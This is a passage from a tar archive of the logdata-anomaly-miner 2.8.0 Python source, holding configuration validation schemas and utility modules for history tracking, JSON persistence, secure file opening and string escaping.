0.000001, 'max': 1.0}, 'num_min_time_history': {'type': 'integer', 'min': 1}, 'num_max_time_history': {'type': 'integer', 'min': 2}, 'num_results_bt': {'type': 'integer', 'min': 1}, 'alpha_bt': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'round_time_interval_threshold': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'acf_threshold': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'force_period_length': {'type': 'boolean'}, 'set_period_length': {'type': 'integer', 'min': 1}, 'min_log_lines_per_time_step': {'type': 'integer', 'min': 1}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'learn_mode': {'type': 'boolean'}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MinimalTransitionTimeDetector'], 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'id_path_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'allow_missing_id': {'type': 'boolean'}, 'num_log_lines_solidify_matrix': {'type': 'integer', 'min': 1}, 'time_output_threshold': {'type': 'integer', 'min': 0}, 'anomaly_threshold': {'type': 'float', 'min': 0, 'max': 1.0}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'learn_mode': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['SimpleUnparsedAtomHandler', 'VerboseUnparsedAtomHandler'], 'required': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} } ] } } } EventHandlerValidationSchema.py000066400000000000000000000071511500476301700407720ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation{ 'EventHandlers': { 'required': False, 'type': 'list', 'nullable': True, 'default': None, 'schema': { 'type': 'dict', 'allow_unknown': False, 'oneof_schema': [ { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'forbidden': [ 'KafkaEventHandler', 'ZmqEventHandler', 'StreamPrinterEventHandler', 'SyslogWriterEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'score': {'type': 'boolean'} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ZmqEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'pretty': {'type': 'boolean'}, 'score': {'type': 'boolean'}, 'weights': {'type': 'dict', 'nullable': True}, 'auto_weights': {'type': 'boolean'}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1}, 'topic': {'type': 'string', 'required': False}, 'url': {'type': 'string', 'empty': False}, }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['KafkaEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'pretty': {'type': 'boolean'}, 'score': {'type': 'boolean'}, 'weights': {'type': 'dict', 'nullable': True}, 'auto_weights': {'type': 'boolean'}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1}, 'topic': {'type': 'string', 'required': True, 'empty': False}, 'cfgfile': {'type': 'string', 'empty': False}, 'options': {'type': 'dict', 'schema': { 'id': {'type': 'string', 'empty': False}, 'type': {'type': ['string', 'list', 'integer']}}}, }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['StreamPrinterEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'pretty': {'type': 'boolean'}, 'score': {'type': 'boolean'}, 'weights': {'type': 'dict', 'nullable': True}, 'auto_weights': {'type': 'boolean'}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1}, 'output_file_path': {'type': 'string', 'empty': False} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['SyslogWriterEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'pretty': {'type': 'boolean'}, 'score': {'type': 'boolean'}, 'weights': {'type': 'dict', 'nullable': True}, 'auto_weights': {'type': 'boolean'}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1}, 'instance_name': {'type': 'string', 'default': 'aminer', 'empty': False} } ] } } } ParserValidationSchema.py000066400000000000000000000153511500476301700376500ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation{ 'Parser': { 'required': True, 'type': 'list', 'schema': { 'type': 'dict', 'allow_unknown': False, 'oneof_schema': [ { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'empty': False, 'forbidden': [ 'ElementValueBranchModelElement', 'DecimalIntegerValueModelElement', 'DecimalFloatValueModelElement', 'DateTimeModelElement', 'MultiLocaleDateTimeModelElement', 'DelimitedDataModelElement', 'JsonModelElement', 'JsonStringModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'args': {'type': ['string', 'list'], 'schema': {'type': ['string', 'integer']}} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['ElementValueBranchModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'args': {'type': ['string', 'list'], 'schema': {'type': ['string', 'integer']}, 'required': True}, 'branch_model_dict': {'type': 'list', 'schema': {'type': 'dict', 'schema': {'id': {'type': [ 'boolean', 'float', 'integer', 'string']}, 'model': {'type': 'string', 'empty': False}}}, 'required': True} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['DecimalFloatValueModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True}, 'value_sign_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory']}, 'value_pad_type': {'type': 'string', 'allowed': ['none', 'zero', 'blank']}, 'exponent_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory']} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['DecimalIntegerValueModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'value_sign_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory']}, 'value_pad_type': {'type': 'string', 'allowed': ['none', 'zero', 'blank']} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['DateTimeModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'date_format': {'type': 'string', 'required': True}, 'start_year': {'type': 'integer', 'nullable': True}, 'text_locale': {'type': 'string', 'nullable': True}, 'max_time_jump_seconds': {'type': 'integer', 'min': 1}, 'timestamp_scale': {'type': 'integer', 'min': 1}, 'time_zone': {'type': 'string', 'nullable': True} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['MultiLocaleDateTimeModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'date_formats': {'type': 'list', 'schema': {'type': 'dict', 'schema': {'format': {'type': 'list', 'schema': { 'type': 'string', 'nullable': True, 'empty': False}, 'maxlength': 3, 'minlength': 3}}}, 'required': True}, 'start_year': {'type': 'integer', 'nullable': True}, 'max_time_jump_seconds': {'type': 'integer', 'min': 1} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['DelimitedDataModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'delimiter': {'type': 'string', 'required': True, 'empty': False}, 'escape': {'type': 'string'}, 'consume_delimiter': {'type': 'boolean'} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['JsonModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'key_parser_dict': {'type': 'dict', 'required': True}, 'optional_key_prefix': {'type': 'string'}, 'nullable_key_prefix': {'type': 'string'}, 'allow_all_fields': {'type': 'boolean'} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['JsonStringModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'key_parser_dict': {'type': 'dict', 'required': True}, 'strict': {'type': 'boolean'}, 'ignore_null': {'type': 'boolean'} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['XmlModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'key_parser_dict': {'type': 'dict', 'required': True}, 'xml_header_expected': {'type': 'boolean'}, 'attribute_prefix': {'type': 'string', 'empty': False}, 'optional_attribute_prefix': {'type': 'string', 'empty': False}, 'empty_allowed_prefix': {'type': 'string', 'empty': False} } ] } } } logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/util/000077500000000000000000000000001500476301700301605ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/util/History.py000066400000000000000000000111231500476301700321710ustar00rootroot00000000000000"""This module contains multiple History classes used by the aminer. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import random import abc import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.input.InputInterfaces import AtomHandlerInterface def get_log_int(max_bits): """Get a log-distributed random integer integer in range 0 to maxBits-1.""" rand_bits = random.randint(0, (1 << max_bits) - 1) # nosec B311 result = 0 while (rand_bits & 1) != 0: result += 1 rand_bits >>= 1 return result class ObjectHistory(metaclass=abc.ABCMeta): """This is the superinterface of all object histories. The idea behind that is to use that type of history best suited for a purpose considering amount of data, possibility for history size limits to be reached, priorization which elements should be dropped first. """ @abc.abstractmethod def add_object(self, new_object): """Add an object to this history. This method call may evict other objects from the history. """ @abc.abstractmethod def get_history(self): """Get the whole history list. Make sure to clone the list before modification when influences on this object are not intended. """ @abc.abstractmethod def clear_history(self): """Clean the whole history.""" class LogarithmicBackoffHistory(ObjectHistory): """This class keeps a history list of items with logarithmic storage characteristics. When adding objects, the list will be filled to the maximum size with the newest items at the end. When filled, adding a new element will replace with probability 1/2 the last element. With a chance of 1/4, the last element will be moved to the next lower position, before putting the new element at the end of the list. With a chance of 1/8, the last two elements are moved, ... Thus the list will in average span a time range of 2^maxItems items with growing size of holes towards the earliest element. """ def __init__(self, max_items, initial_list=None): if isinstance(max_items, bool) or not isinstance(max_items, int): msg = "The max_items variable has to be an integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if max_items <= 0: msg = "The max_items variable has to be greater than zero." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.max_items = max_items if initial_list is None: initial_list = [] else: initial_list = initial_list[:max_items] self.history = initial_list def add_object(self, new_object): """Add a new object to the list according to the rules described in the class docstring.""" if len(self.history) < self.max_items: self.history.append(new_object) else: move_pos = get_log_int(self.max_items - 1) self.history = self.history[:self.max_items - move_pos - 1] + self.history[self.max_items - move_pos:] + [new_object] def get_history(self): """Get the whole history list. Make sure to clone the list before modification when influences on this object are not intended. """ return self.history def clear_history(self): """Clean the whole history.""" self.history[:] = [] class VolatileLogarithmicBackoffAtomHistory(AtomHandlerInterface, LogarithmicBackoffHistory): """This class is a volatile filter to keep a history of log atoms. Example usages can be for analysis by other components or for external access via remote control interface. """ def __init__(self, max_items): """Initialize the history component.""" LogarithmicBackoffHistory.__init__(self, max_items) AtomHandlerInterface.__init__(self) def receive_atom(self, log_atom): """Receive an atom and add it to the history log.""" self.add_object(log_atom) return True logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/util/JsonUtil.py000066400000000000000000000057311500476301700323070ustar00rootroot00000000000000"""This module converts json strings to object structures also supporting byte array structures. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import json import logging import ast from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.util.StringUtil import encode_byte_string_as_string, decode_string_as_byte_string def dump_as_json(input_object): """Dump an input object encoded as string.""" return json.dumps(encode_object(input_object)) def load_json(input_string): """Load a string encoded as object structure.""" return decode_object(json.loads(input_string)) def encode_object(term): """@param term return an object encoded as string.""" if isinstance(term, str): encoded_object = 'string:' + term elif isinstance(term, bytes): encoded_object = 'bytes:' + encode_byte_string_as_string(term) elif isinstance(term, (list, tuple, set)): encoded_object = [encode_object(item) for item in term] elif isinstance(term, dict): encoded_object = {} for key, var in term.items(): if isinstance(key, tuple): key = "tuple:" + str(key) else: key = encode_object(key) var = encode_object(var) encoded_object[key] = var elif isinstance(term, (bool, int, float)) or term is None: encoded_object = term else: msg = f"Unencodeable object {type(term)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) return encoded_object def decode_object(term): """@param term return a string decoded as object structure.""" if isinstance(term, str) and term.startswith('string:'): decoded_object = term[7:] elif isinstance(term, str) and term.startswith('bytes:'): decoded_object = term[6:] decoded_object = decode_string_as_byte_string(decoded_object) elif isinstance(term, list): decoded_object = [decode_object(item) for item in term] elif isinstance(term, dict): decoded_object = {} for key, var in term.items(): if key.startswith("tuple:"): try: key = ast.literal_eval(key[6:]) except ValueError: pass else: key = decode_object(key) var = decode_object(var) decoded_object[key] = var else: decoded_object = term return decoded_object logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/util/PersistenceUtil.py000066400000000000000000000150331500476301700336560ustar00rootroot00000000000000"""This module defines functions for reading and writing files in a secure way. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import errno import os import logging import tempfile import shutil import sys from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.util import SecureOSFunctions from aminer.util import JsonUtil # Have a registry of all persistable components. Those might be happy to be invoked before python process is terminating. persistable_components: list = [] SKIP_PERSISTENCE_ID_WARNING = False def add_persistable_component(component): """Add a component to the registry of all persistable components.""" for c in persistable_components: if hasattr(c, "persistence_file_name") and c.persistence_file_name == component.persistence_file_name: msg = f'Detectors of type {c.__class__.__name__} use the persistence_id "{os.path.split(c.persistence_file_name)[1]}" ' \ f"multiple times. Please assign a unique persistence_id for every component." logging.getLogger(DEBUG_LOG_NAME).warning(msg) if not SKIP_PERSISTENCE_ID_WARNING: print("Warning: " + msg, file=sys.stderr) persistable_components.append(component) def open_persistence_file(file_name, flags): """Open the given persistence file. When O_CREAT was specified, the function will attempt to create the directories too. """ fn_type = type(file_name) if fn_type not in (str, bytes): msg = "file_name has to be of the type string or boolean." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if fn_type == str: file_name = file_name.encode() try: fd = SecureOSFunctions.secure_open_file(file_name, flags) return fd except OSError as openOsError: if ((flags & os.O_CREAT) == 0) or (openOsError.errno != errno.ENOENT): logging.getLogger(DEBUG_LOG_NAME).error(openOsError) raise openOsError create_missing_directories(file_name) return None def replace_persistence_file(file_name, new_file_handle): """Replace the named file with the file referred by the handle.""" try: os.unlink(file_name, dir_fd=SecureOSFunctions.secure_open_base_directory()) except OSError as openOsError: if openOsError.errno != errno.ENOENT: logging.getLogger(DEBUG_LOG_NAME).error(openOsError) raise openOsError tmp_file_name = os.readlink(f"/proc/self/fd/{new_file_handle}") if SecureOSFunctions.base_dir_path.decode() in file_name: file_name = file_name.replace(SecureOSFunctions.base_dir_path.decode(), "").lstrip("/") os.link( tmp_file_name, file_name, src_dir_fd=SecureOSFunctions.tmp_base_dir_fd, dst_dir_fd=SecureOSFunctions.secure_open_base_directory()) os.unlink(tmp_file_name, dir_fd=SecureOSFunctions.tmp_base_dir_fd) def persist_all(): """Persist all persistable components in the registry.""" for component in persistable_components: component.do_persist() def load_json(file_name): """Load persistence data from file. @return None if file did not yet exist. """ persistence_data = None try: persistence_file_handle = open_persistence_file(file_name, os.O_RDONLY | os.O_NOFOLLOW) persistence_data = os.read(persistence_file_handle, os.fstat(persistence_file_handle).st_size) persistence_data = str(persistence_data, "utf-8") os.close(persistence_file_handle) except OSError as openOsError: if openOsError.errno != errno.ENOENT: logging.getLogger(DEBUG_LOG_NAME).error(openOsError) raise openOsError return None result = None try: result = JsonUtil.load_json(persistence_data) except ValueError as value_error: msg = f"Corrupted data in {file_name, value_error}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) return result def store_json(file_name, object_data): """Store persistence data to file.""" persistence_data = JsonUtil.dump_as_json(object_data) # Create a temporary file within persistence directory to write new persistence data to it. # Thus, the old data is not modified, any error creating or writing the file will not harm the old state. fd, _ = tempfile.mkstemp(dir=SecureOSFunctions.tmp_base_dir_path) os.write(fd, bytes(persistence_data, "utf-8")) create_missing_directories(file_name) replace_persistence_file(file_name, fd) os.close(fd) def create_missing_directories(file_name): """Create missing persistence directories.""" # Find out, which directory is missing by stating our way up. dir_name_length = file_name.rfind("/") if dir_name_length > 0 and not os.path.exists(file_name[:dir_name_length]): os.makedirs(file_name[:dir_name_length]) def clear_persistence(persistence_dir_name): """Delete all persistence data from the persistence_dir.""" for filename in os.listdir(persistence_dir_name): if filename == "backup": continue file_path = os.path.join(persistence_dir_name, filename) try: if not os.path.isdir(file_path): msg = "The aminer persistence directory should not contain any files." print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).warning(msg) continue shutil.rmtree(file_path) except OSError as e: msg = f"Failed to delete {file_path}. Reason: {e}" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) def copytree(src, dst, symlinks=False, ignore=None): """Copy a directory recursively. This method has no issue with the destination directory existing (shutil.copytree has). """ for item in os.listdir(src): s = os.path.join(src, item) d = os.path.join(dst, item) if os.path.isdir(s): shutil.copytree(s, d, symlinks, ignore) else: shutil.copy2(s, d) SecureOSFunctions.py000066400000000000000000000215171500476301700340420ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/util"""This module defines functions for secure file handling. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import socket import struct import sys import logging from aminer.AminerConfig import DEBUG_LOG_NAME base_dir_fd = None tmp_base_dir_fd = None log_dir_fd = None base_dir_path = None tmp_base_dir_path = None log_dir_path = None def secure_open_base_directory(directory_name=None, flags=0): """Open the base directory in a secure way.""" global base_dir_fd global base_dir_path global tmp_base_dir_fd global tmp_base_dir_path if directory_name is not None and isinstance(directory_name, str): directory_name = directory_name.encode() if base_dir_path is None and (directory_name is None or not directory_name.startswith(b'/')): msg = 'Secure open on relative path not supported and an empty directory_name is not allowed when calling this function for'\ ' the first time.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if base_dir_fd is None: base_dir_fd = os.open(directory_name, flags | os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY) base_dir_path = directory_name tmp_base_dir_path = directory_name tmp_base_dir_fd = os.open(tmp_base_dir_path, flags | os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY) return base_dir_fd def close_base_directory(): """Close the base directory at program shutdown.""" global base_dir_fd global tmp_base_dir_fd global base_dir_path try: if base_dir_fd is not None: os.close(base_dir_fd) base_dir_fd = None base_dir_path = None if tmp_base_dir_fd is not None: os.close(tmp_base_dir_fd) tmp_base_dir_fd = None except OSError as e: msg = f"Could not close the base directory. Error: {e}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def secure_open_log_directory(log_directory_name=None, flags=0): """Open the base log directory in a secure way.""" global log_dir_fd global log_dir_path if log_directory_name is not None and isinstance(log_directory_name, str): log_directory_name = log_directory_name.encode() if log_dir_path is None and (log_directory_name is None or not log_directory_name.startswith(b'/')): msg = 'Secure open on relative path not supported' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if log_dir_fd is None: if base_dir_path is not None and log_directory_name.startswith(base_dir_path): # dir_fd is ignored with absolute paths. base_name = log_directory_name.replace(base_dir_path, b'').lstrip(b'/') log_dir_fd = os.open(base_name, flags | os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY, dir_fd=base_dir_fd) log_dir_path = log_directory_name else: log_dir_fd = os.open(log_directory_name, flags | os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY) log_dir_path = log_directory_name return log_dir_fd def close_log_directory(): """Close the base directory at program shutdown.""" global log_dir_fd global log_dir_path try: if log_dir_fd is not None: os.close(log_dir_fd) log_dir_fd = None log_dir_path = None except OSError as e: msg = f"Could not close the base log directory. Error: {e}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def secure_open_file(file_name, flags): """Secure opening of a file with given flags. This call will refuse to open files where any path component is a symlink. As operating system does not provide any means to do that, open the file_name directory by directory. It also adds O_NOCTTY to the. flags as controlling TTY logics as this is just an additional risk and does not make sense for opening of log files. @param file_name is the file name as byte string """ if isinstance(file_name, str): file_name = file_name.encode() if not file_name.startswith(b'/'): msg = 'Secure open on relative path not supported' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if (file_name.endswith(b'/') or os.path.isdir(file_name)) and ((flags & os.O_DIRECTORY) == 0): msg = 'Opening directory but O_DIRECTORY flag missing' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if base_dir_path is not None: if file_name.startswith(base_dir_path): base_name = file_name.replace(base_dir_path, b'').lstrip(b'/') else: base_name = file_name return os.open(base_name, flags | os.O_NOFOLLOW | os.O_NOCTTY, dir_fd=base_dir_fd) # dir_fd is ignored with absolute paths. dir_name = os.path.dirname(file_name) base_name = os.path.basename(file_name) dir_fd = os.open(dir_name, flags | os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY) ret_fd = os.open(base_name, flags | os.O_NOFOLLOW | os.O_NOCTTY, dir_fd=dir_fd) # dir_fd is ignored with absolute paths. os.close(dir_fd) return ret_fd def send_annotated_file_descriptor(send_socket, send_fd, type_info, annotation_data): """ Send file descriptor and associated annotation data via SCM_RIGHTS. @param type_info has to be a null-byte free string to inform the receiver how to handle the file descriptor and how to interpret the annotationData. @param annotation_data this optional byte array may convey additional information about the file descriptor. """ # Construct the message data first if isinstance(type_info, str): type_info = type_info.encode() if isinstance(annotation_data, str): annotation_data = annotation_data.encode() if type_info.find(b'\x00') >= 0: msg = 'Null bytes not supported in typeInfo' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) message_data = b'%s\x00%s' % (type_info, annotation_data) send_socket.sendmsg([message_data], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, struct.pack('i', send_fd))]) def send_logstream_descriptor(send_socket, send_fd, send_file_name): """Send a file descriptor to be used as standard log data stream source for the analysis pipeline.""" send_annotated_file_descriptor(send_socket, send_fd, b'logstream', send_file_name) def receive_annotated_file_descriptor(receive_socket): """Receive a single file descriptor and attached annotation information via SCM_RIGHTS via the given socket. The method may raise an Exception when invoked on non-blocking sockets and no messages available. @return a tuple containing the received file descriptor, type information (see sendAnnotatedFileDescriptor) and the annotation information. """ message_data, anc_data, _flags, _remote_address = receive_socket.recvmsg(1 << 16, socket.CMSG_LEN(struct.calcsize('i'))) if len(anc_data) != 1: msg = f"Received {len(anc_data)} sets of ancillary data instead of 1" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) cmsg_level, cmsg_type, cmsg_data = anc_data[0] if (cmsg_level != socket.SOL_SOCKET) or (cmsg_type != socket.SCM_RIGHTS): msg = 'Received invalid message from remote side' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Do not accept multiple or unaligned FDs. if len(cmsg_data) != 4: msg = f"Unsupported control message length {len(cmsg_data)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) received_fd = struct.unpack('i', cmsg_data)[0] split_pos = message_data.find(b'\x00') if split_pos < 0: msg = 'No null byte in received message' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) type_info = message_data[:split_pos] annotation_data = message_data[split_pos + 1:] if received_fd <= 2: msg = f'received "reserved" fd {received_fd}' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) if isinstance(type_info, str): type_info = type_info.encode() if isinstance(annotation_data, str): annotation_data = annotation_data.encode() return received_fd, type_info, annotation_data logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/util/StringUtil.py000066400000000000000000000071101500476301700326350ustar00rootroot00000000000000"""Some useful string-functions. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging import sys import os from aminer.AminerConfig import DEBUG_LOG_NAME colflame = ("\033[31m" " * ( ) ( \n" " ( ( ` )\\ ) ( /( )\\ ) \n" " )\\ )\\))( (()/( )\\()) ( (()/( \n" "\033[33m" "((((_)( ((_)()\\ /(_))(_)\\ )\\ /(_)) \n" " )\\ _ )\\(_()((_)(_)) _((_)((_) (_)) \n" " (_)\033[39m_\\\033[33m()\033[39m| \\/ ||_ _|| \\| || __|| _ \\ \n" " / _ \\ | |\\/| | | | | .` || _| | / \n" " /_/ \\_\\|_| |_||___||_|\\_||___||_|_\\ " "\033[39m") flame = (" * ( ) ( \n" " ( ( ` )\\ ) ( /( )\\ ) \n" " )\\ )\\))( (()/( )\\()) ( (()/( \n" "((((_)( ((_)()\\ /(_))(_)\\ )\\ /(_)) \n" " )\\ _ )\\(_()((_)(_)) _((_)((_) (_)) \n" " (_)_\\()| \\/ ||_ _|| \\| || __|| _ \\ \n" " / _ \\ | |\\/| | | | | .` || _| | / \n" " /_/ \\_\\|_| |_||___||_|\\_||___||_|_\\ ") def supports_color(): """Return True if the running system's terminal supports color, and False otherwise. The function was borrowed from the django-project (https://github.com/django/django/blob/master/django/core/management/color.py) """ plat = sys.platform supported_platform = plat != 'Pocket PC' and (plat != 'win32' or 'ANSICON' in os.environ) # isatty is not always implemented, #6223. is_a_tty = hasattr(sys.stdout, 'isatty') and sys.stdout.isatty() return supported_platform and is_a_tty def decode_string_as_byte_string(string): """Decode a string produced by the encode function encodeByteStringAsString(byteString) below. @return string. """ decoded = b'' count = 0 while count < len(string): if string[count] in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!"#$&\'()*+,-./:;<=>?@[]\\^_`{}|~ ': decoded += bytes(string[count], 'ascii') count += 1 elif string[count] == '%': decoded += bytearray((int(string[count + 1:count + 3], 16),)) count += 3 else: msg = 'Invalid encoded character' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) return decoded def encode_byte_string_as_string(byte_string): r"""Encode an arbitrary byte string to a string. This is achieved by replacing all non ascii-7 bytes and all non printable ascii-7 bytes and % character by replacing with their escape. sequence %[hex]. For example byte string b'/\xc3' is encoded to '/%c3' @return a string with decoded name. """ encoded = '' for byte in byte_string: if byte in b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!"#$&\'()*+,-./:;<=>?@[]\\^_`{}|~ ': encoded += chr(byte) else: encoded += '%%%02x' % byte return encoded 